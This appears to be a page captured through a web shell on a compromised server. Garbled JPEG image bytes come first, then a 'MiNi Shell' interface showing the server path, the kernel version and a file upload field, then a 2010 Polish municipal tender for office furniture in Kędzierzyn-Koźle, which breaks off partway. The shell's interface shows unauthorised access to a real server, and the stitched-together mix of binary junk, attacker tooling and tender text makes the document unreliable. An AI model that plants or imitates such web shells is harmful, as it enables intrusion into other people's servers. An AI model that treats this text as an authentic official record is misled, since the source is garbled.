JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100517/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100517/132938-N-2010.html

<p class="kh_header"><b>Kędzierzyn-Koźle: Dostawa mebli biurowych z aranżacją wnętrz, projektami mebli do wykonania oraz montażem i ich rozmieszczeniem w budynku UM Kędzierzyn-Koźle przy ul. Piramowicza 32.</b><br>
<b>Numer ogłoszenia: 132938 - 2010; data zamieszczenia: 17.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kędzierzyn-Koźle , ul. Planetorza 2, 47-200 Kędzierzyn-Koźle, woj. opolskie, tel. 0-77 4052603, faks 0-77 4052603.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kedzierzynkozle.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa mebli biurowych z aranżacją wnętrz, projektami mebli do wykonania oraz montażem i ich rozmieszczeniem w budynku UM Kędzierzyn-Koźle przy ul. Piramowicza 32..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia na:

1)	Opracowanie:
a) koncepcji (aranżacji) wyposażenia w meble, krzesła i fotele standardowe oraz meble niestandardowe,
b) projektu technicznego mebli niestandardowych;  
2)	dostawa, montaż i ustawienie mebli, krzeseł i foteli standardowych oraz  wykonanie i montaż  mebli  niestandardowych;
we wskazanych przez Zamawiającego pomieszczeniach pracy w budynku Urzędu Miasta Kędzierzyn-Koźle  przy 
ul. Grzegorza Piramowicza 32.

I. Rodzaj  przedmiotu zamówienia według Wspólnego Słownika Zamówień (CPV):

39130000-2 - meble biurowe

II. Wymagania dotyczące opracowania koncepcji (aranżacji) wyposażenia pomieszczeń pracy 
w meble, krzesła i fotele standardowe oraz meble niestandardowe a także  projektu technicznego mebli niestandardowych:
1.	Opracowanie:
1)	koncepcji (aranżacji) wyposażenia pomieszczeń pracy w meble, krzesła i fotele standardowe oraz meble niestandardowe,
 2)	projektu technicznego mebli niestandardowych, winno uwzględniać wymogi określone w przepisach:
a)	rozporządzenia Ministra Pracy i Polityki Socjalnej z dnia 26 września 1997 r. w sprawie ogólnych przepisów bezpieczeństwa i higieny pracy ( Dz. U z 2003 r., Nr 169 poz.1650 z późn. zm.) w zakresie dotyczącym pomieszczeń pracy;
b)	rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz. U. Nr 75 poz.690 z późn. zm.) w zakresie dotyczącym  zagospodarowania pomieszczeń biurowych przeznaczonych na pobyt ludzi.
2.	Sporządzenie opracowań wymienionych w ust.1 winno zostać poprzedzone  przez Wykonawcę:
1)	oględzinami wszystkich pomieszczeń pracy przewidzianych do wyposażenia w meble, krzesła i fotele standardowe oraz meble niestandardowe;
2)	omówieniem programu funkcjonalno-użytkowego poszczególnych pomieszczeń pracy z kierownikami jednostek organizacyjnych Urzędu Miasta do użytku których zostaną oddane te pomieszczenia, 
zgodnie z zamieszczonym wykazem we wniosku o dopuszczenie do postępowania publikowanym na stronie internetowej Zamawiającego www.kedzierzynkozle.pl.
 
III.  Ogólne wymagania dotyczące wykonania  dostawy:

1.	Meble, krzesła i fotele powinny być fabrycznie nowe, gotowe do użytku wolne od wad jawnych i ukrytych.
2.	Wykonanie zamówienia obejmuje dostawę do siedziby Zamawiającego, rozładunek, wniesieniem na poszczególne kondygnacje budynku Urzędu Miasta montaż i ustawienie  wg wskazań Zamawiającego (budynek posiada dźwig osobowy).
3.	Elementy klejone mebli winny zostać dostarczone w całości. Klejenie mebli w siedzibie Zamawiającego możliwe jest tylko w uzasadnionych technologią montażu, uzgodnionych z Zamawiającym przypadkach.
4.	Warunki gwarancji - minimum 24 miesiące od daty odbioru.

IV. Wymagania dotyczące mebli standardowych:
 
1.	Meble winny być wykonane z płyty meblowej w kolorze ( fakultatywnie  wg wskazania Zamawiającego) buk, czereśnia, grusza, olcha, laminowana melaminą w klasie higieny E-1.
2.	Wykończenie mebli: obrzeża płyty wykończone listwą PCV- ABS o grubości 2 mm klejone pod wysokim ciśnieniem na gorąco. 
3.	Wszystkie szafy, komody, witryny, kontenery winny być zamykane na klucz. Komplet kluczy w worku foliowym winien zostać przed odbiorem przyklejony taśmą klejącą przy każdym zamku.
4.	Biurka i stoły winny spełniać wymagania określone w:
1)	rozporządzeniu Ministra Pracy i Polityki Socjalnej z 1 grudnia 1998r. w sprawie bezpieczeństwa i higieny pracy na stanowiskach wyposażonych w monitory ekranowe (Dz. U. Nr 148 poz. 973)
2)	PN-EN 527-1 Meble biurowe. Stoły robocze i biurka, PN-EN 527-2 Meble biurowe. Stoły robocze i biurka. Mechaniczne wymagania bezpieczeństwa.
5.	Szafy i komody winny spełniać wymagania określone w  PN-EN 14073-2 Meble biurowe. Meble do przechowywania. Wymagania bezpieczeństwa
6.	Wykaz i wymiary mebli standardowych (tolerancja wymiarów zewnętrznych  plus-minus 10 cm) zgodne z wykazem we wniosku o dopuszczenie do postępowania publikowanym na stronie internetowej Zamawiającego www.kedzierzynkozle.pl.
 
7. Parametry  techniczne i jakościowe mebli standardowych

1) Biurko  I  i Biurko II (poz. 1 i 2 wykazu):
a) blat biurka wykonany z płyty o grubości 28 mm wykończony listwą PCV - ABS
o grubości 2 mm,
b) boki biurka (nogi) wykonane z płyty meblowej o grubości 28 mm wykończone listwą
PCV - ABS o grubości 2 mm,
c) blenda przednia z płyty meblowej o grubości 18 mm i wysokości 450 mm połączona
na stałe z blatem i bokami biurka,
d) regulacja poziomowania biurek za pomocą nakładanych stopek,
e) w blacie biurka w rogu po prawej i lewej stronie otwory z zaślepkami (przelotki) na
kable

2) Przystawka do biurka (poz. 3 wykazu ):
a) blat przystawki wykonany z płyty o grubości 28 mm, wykończony listwą PCV - BAS
o grubości 2 mm,
b) boki przystawki (nogi) wykonane z płyty meblowej o grubości 28 mm, wykończone
listwą PCV - ABS o grubości 2 mm,
c) blenda przednia z płyty meblowej o grubości 18 mm i wysokości 450 mm, połączona
na stałe z blatem i bokami biurka,
d) regulacja poziomowania przystawki za pomocą nakładanych stopek,
e) w blacie przystawki (po zewnętrznej stronie) w rogu po prawej i lewej stronie otwory
z zaślepkami (przelotki) na kable;

3) Kontenery do biurek ( poz. 4, 5 wykazu):
a) korpus wykonany z płyty meblowej o grubości 18 mm,
b) wieniec górny i dolny z pełnej płyty meblowej o grubości 28 mm,
c) wyposażony w trzy szuflady i piórnik na prowadnicach pełnego wysuwu,
d) wyposażony w zamek centralny zamykający wszystkie szuflady,
e) wyposażony w kółka jezdne obrotowe,
f) uchwyty do szuflad metalowe łukowe o rozstawie 128 mm, kolor - satyna

4)  Stół  (poz. 6 wykazu):
a) blat stołu wykonany z płyty o grubości 28 mm, wykończony listwą PCV - ABS
o grubości 2 mm,
b) nogi stołu metalowe , o 50 mm, wkręcane pod blatem do zamontowanych gniazd gwintowanych;

5) Komoda  (poz. 7 wykazu ):
a) boki i półki wykonane z płyty o grubości 18 mm,
b) wieniec górny i dolny wykonany z płyty o grubości 28 mm,
c) wyposażona w zamek meblowy,
d) wyposażona w stopki do regulacji  wysokości,
e) zawiasy puszkowe typu BLUM metalowe z samodomykaczem,
f) uchwyty do drzwi metalowe łukowe o rozstawie 128 mm, kolor - satyna,
g) drzwi oklejone PCV 2 mm, korpus 0,8 mm,
h) jedna wkładana półka o szerokości-głębokości 40 cm,
i) plecy  komody wykonane z płyty wiórowej 12 mm.

6) Szafa aktowa 2-drzwiowa pełna z nadstawką - wysokość 240 cm(poz. 8 wykazu ):
a) boki i półki wykonane z płyty o grubości 18 mm,
b) wieniec górny i dolny wykonany z płyty o grubości 28 mm,
c) trzecia (od dołu) półka konstrukcyjna związana na stałe z bokami szafy,
d) wyposażona w zamek meblowy typu HUWILL, baskwilowy trzypunktowy,
e) wyposażona w stopki do regulacji wysokości,
f) zawiasy puszkowe typu BLUM metalowe z samodomykaczem,
g) uchwyty do drzwi metalowe łukowe o rozstawie 128 mm, kolor - satyna,
h) drzwi oklejone PCV 2 mm, korpus 0,8 mm,
i) półki o szerokości-głębokości 40 cm,
j) wszystkie szafy z nadstawkami wg wymiarów,
k) nadstawka zamykana na zamek meblowy,
l) w szafie z nadstawką po pięć półek (jedna w nadstawce, cztery w szafie - w tym jedna konstrukcyjna)                                                                                               ł) plecy szafy wykonane z płyty  wiórowej 12 mm. 

7) Szafa aktowa 2-drzwiowa pełna bez nadstawki - wysokość 200 cm (poz. 9 wykazu):
a) boki i półki wykonane z płyty o grubości 18 mm,
b) wieniec górny i dolny wykonany z płyty o grubości 28 mm,
c) trzecia (od dołu) półka konstrukcyjna związana na stałe z bokami szafy,
d) w każdej szafie po pięć półek (4 wkładane, 1 konstrukcyjna),
e) wyposażona w zamek meblowy typu HUWILL, baskwilowy trzypunktowy,
f) wyposażona w stopki do regulacji wysokości,
g) zawiasy puszkowe typu BLUM metalowe z samodomykaczem,
h) uchwyty do drzwi metalowe łukowe o rozstawie 128 mm, kolor - satyna,
i) drzwi oklejone PCV 2 mm, korpus 0,8 mm,
j) półki o szerokości/głębokości 40 cm,
k) plecy szafy wykonane z płyty wiórowej 12 mm;

8) Szafa aktowa 1-drzwiowa pełna bez nadstawki - wysokość 200 cm (poz. 10 wykazu ):
a) boki i półki wykonane z płyty o grubości 18 mm,
b) wieniec górny i dolny wykonany z płyty o grubości 28 mm,
c) trzecia (od dołu) półka konstrukcyjna związana na stałe z bokami szafy,
d) w każdej szafie po pięć półek (4 wkładane, 1 konstrukcyjna),
e) wyposażona w zamek meblowy typu HUWILL, baskwilowy trzypunktowy,
f) wyposażona w stopki do regulacji wysokości,
g) zawiasy puszkowe typu BLUM metalowe z samodomykaczem,
h) uchwyty do drzwi metalowe łukowe o rozstawie 128 mm, kolor - satyna,
i) drzwi oklejone PCV 2 mm, korpus 0,8 mm,
j) półki o szerokości/głębokości 40 cm,
k) plecy szafy wykonane z płyty wiórowej 12 mm,
l) zawiasy drzwi montowane po prawej stronie;

9) Szafa odzieżowa 1-drzwiowa pełna bez nadstawki - wysokość 200 cm
(poz. 11 wykazu):
a) boki i półki wykonane z płyty o grubości 18 mm,
b) wieniec górny i dolny wykonany z płyty o grubości 28 mm,
c) wyposażona w zamek meblowy,
d) wyposażona w stopki do regulacji wysokości,
e) zawiasy puszkowe typu BLUM metalowe z samodomykaczem,
f) uchwyty do drzwi metalowe łukowe o rozstawie 128 mm, kolor - satyna,
g) drzwi oklejone PCV 2 mm, korpus 0,8 mm,
h) półki o szerokości/głębokości 40 cm,
i) plecy szafy wykonane z płyty wiórowej 12 mm,
j) zawiasy drzwi montowane po prawej stronie,
k) w szafie odzieżowej nad wieszakiem jedna półka wklejona na stałe, plus jedna wkładana półka powyżej; 

10 ) Szafa metalowa - wysokość 200 cm (poz.12 wykazu): 
a) wyposażona w zamek meblowy,
b) wyposażona w stopki do regulacji wysokości.

11) Witrynka - wysokość 150 cm (poz.13 wykazu):
a) boki i półki wykonane z płyty o grubości 18 mm,
b) wieniec górny i dolny wykonany z płyty o grubości 28 mm,
c) wyposażona w zamek meblowy ( oddzielnie część oszklona i zabudowana) ,
d) wyposażona w stopki do regulacji wysokości,
e) zawiasy puszkowe typu BLUM metalowe z samodomykaczem,
f) uchwyty do drzwi metalowe łukowe o rozstawie 128 mm, kolor - satyna,
g) 4 regulowane półki,
h) wyposażona w stopki do regulacji wysokości,
i) 3 górne półki zamykane drzwiami wykonanymi z szyby
j ) dolna półka zamykana drzwiami oklejonymi oklejone PCV 2 mm, korpus 0,8 mm.
 
12) Witryna  - wysokość 200 cm (poz. 14 wykazu):
a) boki i półki wykonane z płyty o grubości 18 mm,
b) wieniec górny i dolny wykonany z płyty o grubości 28 mm,
c) wyposażona w zamek meblowy ( oddzielnie część oszklona i zabudowana) ,
d) wyposażona w stopki do regulacji wysokości,
e) zawiasy puszkowe typu BLUM metalowe z samodomykaczem,
f) uchwyty do drzwi metalowe łukowe o rozstawie 128 mm, kolor - satyna,
g) 4 regulowane półki
h) wyposażona w stopki do regulacji wysokości,
i) 3 górne półki zamykane drzwiami wykonanymi z szyby
j) 1 dolna półka zamykana drzwiami oklejonymi oklejone PCV 2 mm, korpus 0,8 mm.
13 ) Regał meblowy - wysokość 200 cm ( poz.15 wykazu):
a) boki i półki wykonane z płyty o grubości 18 mm,
b) wieniec górny i dolny wykonany z płyty o grubości 28 mm,
c) wyposażony w stopki do regulacji wysokości,
V . Wymagania dotyczące mebli niestandardowych  
1.Meble winny być wykonane z   płyty meblowej  w kolorze ( fakultatywnie  wg wskazania Zamawiającego)  buk, czereśnia, grusza,  olcha, laminowana melaminą w klasie higieny E-1.
2. Wykończenie mebli: obrzeża płyty wykończone listwą PCV- ABS o grubości 2 mm klejone pod wysokim ciśnieniem na gorąco. 
3. Wszystkie szafy, biurka, kontenery i drzwi  winny być zamykane na klucz. Komplet kluczy w worku foliowym  winien zostać przed odbiorem przyklejony taśmą klejącą przy każdym zamku.
4. Biurka i stoły winny spełniać wymagania określone w :
1) rozporządzeniu Ministra Pracy i Polityki Socjalnej z 1 grudnia 1998r. w sprawie bezpieczeństwa i higieny pracy na stanowiskach wyposażonych w monitory ekranowe          ( Dz.U. Nr 148 poz. 973 )
2) PN-EN 527-1 Meble biurowe. Stoły robocze i biurka,                                                                                    
    PN-EN 527-2 Meble biurowe. Stoły robocze i biurka. Mechaniczne wymagania       bezpieczeństwa.
5. Szafy i komody winny spełniać wymagania określone w  PN-EN 14073-2 Meble biurowe.     Meble do przechowywania. Wymagania bezpieczeństwa.
6. Wykaz i wymiary mebli  niestandardowych  (tolerancja wymiarów zewnętrznych  plus-minus 10 cm)zgodne z wykazem we wniosku o dopuszczenie do postępowania publikowanym na stronie internetowej Zamawiającego www.kedzierzynkozle.pl.

7.Parametry  techniczne i jakościowe mebli niestandardowych. 

1) Szafa do zabudowy z drzwiami przesuwnymi ( poz. 1 wykazu mebli niestandardowych):
a) boki i półki wykonane z płyty o grubości min. 18 mm,
b) wieniec górny i dolny wykonany z płyty o grubości 28 mm,
d)drzwi przesuwne   wyposażone w zamek meblowy,
e) profile drzwi przesuwnych - aluminiowe, 
f) drzwi oklejone PCV 2 mm, korpus 0,8 mm,
g) półki o szerokości/głębokości min 40 cm,
h) plecy szafy wykonane z płyty wiórowej 12 mm.

2) Biurko niestandardowe  I-VI ( poz. 2 - 7  wykazu mebli niestandardowych):
a) blat biurka wykonany z płyty o grubości 28 mm wykończony listwą PCV - ABS
o grubości 2 mm,
b) boki biurka (nogi) wykonane z płyty meblowej o grubości 28 mm wykończone listwą
PCV - ABS o grubości 2 mm,
c) blenda przednia z płyty meblowej o grubości 18 mm i wysokości 450 mm połączona
na stałe z blatem i bokami biurka,
d) regulacja poziomowania biurek za pomocą nakładanych stopek,
e) w blacie biurka w rogu po prawej i lewej stronie otwory z zaślepkami (przelotki) na kable.

3)Biurko z  półką na komputer - stację roboczą ( poz. 8 wykazu mebli niestandardowych):
a) blat biurka wykonany z płyty o grubości 28 mm wykończony listwą PCV - ABS
o grubości 2 mm,
b) boki biurka (nogi) wykonane z płyty meblowej o grubości 28 mm wykończone listwą
PCV - ABS o grubości 2 mm,
c) blenda przednia z płyty meblowej o grubości 18 mm i wysokości 450 mm połączona
na stałe z blatem i bokami biurka,
d) regulacja poziomowania biurek za pomocą nakładanych stopek,
e) w blacie biurka w rogu po prawej i lewej stronie otwory z zaślepkami (przelotki) na
kable.

4) Stół konferencyjny I i II ( poz. 9 i 10 wykazu mebli niestandardowych):                        
a) blat stołu wykonany z płyty o grubości 36 mm, wykończony listwą PCV -ABS o grubości 2 mm, klejone pod wysokim ciśnieniem na gorąco,
b) boki stołu (nogi) z płyty o grubości 36 mm, wykończone listwą PCV - ABS 2 mm, klejone pod wysokim ciśnieniem na gorąco.

5)  Stolik okolicznościowy (poz. 11 wykazu mebli niestandardowych ) :
a) blat stołu wykonany z płyty o grubości 36 mm, wykończony listwą PCV -
ABS o grubości 2 mm, klejone pod wysokim ciśnieniem na gorąco,
b) boki stołu (nogi) z płyty o grubości 36 mm, wykończone listwą PCV - ABS 2 mm,
klejone pod wysokim ciśnieniem na gorąco.

6) Lada z drzwiami przesuwnymi ( poz. 12 wykazu mebli niestandardowych)
a) blat lady  wykonany z płyty o grubości 36 mm, wykończony listwą PCV -ABS o grubości 2 mm, klejone pod wysokim ciśnieniem na gorąco,
b) boki z płyty o grubości 36 mm, wykończone listwą PCV - ABS 2 mm, klejone pod wysokim ciśnieniem na gorąco,
c) profile drzwi przesuwnych - aluminiowe, 
d)na  blacie- szyby ze szkła hartowanego , mocowane w stelażu metalowym.

VI.  Wymagania dotyczące krzeseł i  foteli obrotowych  

1.Fotele obrotowe winny  spełniać wymagania określone w:
1) rozporządzeniu Ministra Pracy i Polityki Socjalnej z 1 grudnia 1998r. w sprawie bezpieczeństwa i higieny pracy na stanowiskach wyposażonych w monitory ekranowe ( Dz. U. Nr 148 poz. 973 );
2) PN-EN 1335-1 Meble biurowe. Krzesło biurowe do pracy,
    PN-EN 1335-2 Meble biurowe. Krzesło biurowe do pracy. Wymagania bezpieczeństwa.

2.  Wykaz i  liczba krzeseł i foteli .

1) Krzesło stacjonarne miękkie typu ISO ( lub  równoważne) 10 szt.
2) Krzesło drewniane na stelażu metalowym - czarne  10 szt.
3) Fotel obrotowy w tapicerce z  podłokietnikami 95  szt. 
4) Krzesło do stołu konferencyjnego 27 szt.

3 . Parametry  techniczne oraz jakościowe krzeseł  i foteli ( tolerancja wymiarów zewnętrznych  plus-minus 3 cm)

1) Krzesło stacjonarne miękkie typu ISO lub równoważne (poz. 1 wykazu ):
a) krzesło stacjonarne, np. typu ISO, na stelażu metalowym malowanym proszkowo na
kolor czarny, końcówki rur zabezpieczone stopkami ze sztucznego tworzywa,
b) miękkie siedzisko i oparcie tapicerowane tkaniną poliestrową w kolorze, z gęstym splotem włókien o odporności na ścieralność 100.000 cykli Martindala,  z atestem trudnopalności-norma europejska PN-EN 1021-1,
c) bez podłokietników,
d) możliwość składowania w stosie.

2) Krzesło drewniane na stelażu metalowym  (poz. 2 wykazu):
a) bez podłokietników, na konstrukcji metalowej,
b) siedzisko i oparcie wykonane ze sklejki liściastej ;
c) wymiary siedziska: wysokość 45 cm, szerokość 45 cm, głębokość 40 cm,
d) wymiary oparcia: szerokość 45 cm, wysokość 42 cm
e) oparcie wyprofilowane owalnie.

3) Fotel obrotowy z podłokietnikami w tapicerce - (poz. 3 wykazu):
a) fotel obrotowy z mechanizmem SYNCHRO oraz kółkami obrotowymi do powierzchni
twardych,
b) wysokie wyprofilowane oparcie zwężane ku górze o wysokości części tapicerowanej
50 - 52 cm, tylna część oparcia wykonana z tworzywa sztucznego,
c) siedmiostopniowa przeskokowa regulacja oparcia góra - dół,
d) wysokość siedziska regulowana za pomocą tłoka gazowego,
e) siedzisko o wymiarach: szerokość 48 cm i głębokość 46 cm, siedzisko wyprofilowane
- przód wywinięty do dołu i lekko pochylony,
f) wysokość maksymalna siedziska 55 - 58 cm,
g) wysokość minimalna siedziska 43 - 45 cm,
h) podłokietniki  pokryte miękkim poliuretanem ,
i) fotel wyposażony w mechanizm synchroniczny pozwalający na jednoczesne
odchylanie siedziska i oparcia z blokadą antyszok,
j) podstawa pięcioramienna typu pająk o konstrukcji metalowej, zabezpieczona
maskownicami plastikowymi (każde ramię wyprofilowane jako łagodny łuk
wznoszący się od kółek w kierunku środka podstawy) w kolorze czarnym),
k) regulacja mechanizmów krzesła za pomocą jednej lub dwóch dźwigni;


4) Krzesło do stołu konferencyjnego ( poz. 4 wykazu)
a) oparcie wykonane na bazie profilowanej formatki sklejkowej o grubości 10 mm i zastosowaniem zimno formowanej pianki, której kształt zapewnia pewne i ergonomiczne podparcie kręgosłupa. Szerokość na wysokości siedziska  460 mm. Szerokość górnej krawędzi 440 mm. Wysokość od poziomu siedziska 440 mm
b) siedzisko wykonane na bazie formatki sklejkowej o grubości 10 mm, posiadającej specjalny układ tapicerski z zastosowaniem zimno formowanej pianki, która gwarantuje długotrwałą odporność na deformacje oraz zapewnia optymalny komfort.
Szerokość z przodu 480 mm. Szerokość przy oparciu 460 mm. Głębokość 460 mm
c) oparcie i siedzisko stanowią osobne formatki sklejkowe połączone elementem z blachy
zapewniającym dodatkową sprężystość oparcia. Oba elementy winny posiadać proste,
geometryczne kształty, a boki tapicerki doszywane . Grubość siedziska min 60 mm,a oparcia min 50 mm.
d) stelaż wykonany z rury o średnicy min. 25mm. Boki stelaża poza obrysem siedziska, a element łączący przednią i tylną nogę ugięty w regularny łuk, który w środkowej części dochodzi do poziomu siedziska. Stelaż chromowany. 
e ) wymiary całkowite zewnętrzne : 
-	wysokość całkowita  krzesła 880 mm
- 	wysokość siedziska 450 mm.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonanie w okresie ostatnich 3 lat tj. od 27-05-2007r.do 27-05-2010r. a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - dostaw (dla świadczeń okresowych lub ciągłych również wykonywanych)  o charakterze: dostawa mebli biurowych na wartość łączną, co najmniej 300.000 zł z potwierdzeniem ich należytego wykonania.
W przypadku wniosków wspólnych, doświadczenie podlega sumowaniu.
Zamawiający będzie oceniał spełnienie powyższego warunku na podstawie złożonych dokumentów potwierdzających jego spełnienie  (określonych w poz. 1  wykazu  wymaganych dokumentów) oraz na podstawie przyjętej punktacji tj. 50 pkt. bazowych + 5 pkt. dodatkowych za każdą dodatkowe 50.000 zł wykonanych dostaw powyżej  kwoty 300.000 zł w podanym okresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie środków finansowych w wysokości, co najmniej 150 000,00- zł lub posiadanie zdolności kredytowej do zaciągnięcia kredytu w tej wysokości lub w wysokości uzupełniającej środki posiadane na koncie do wymaganej kwoty.
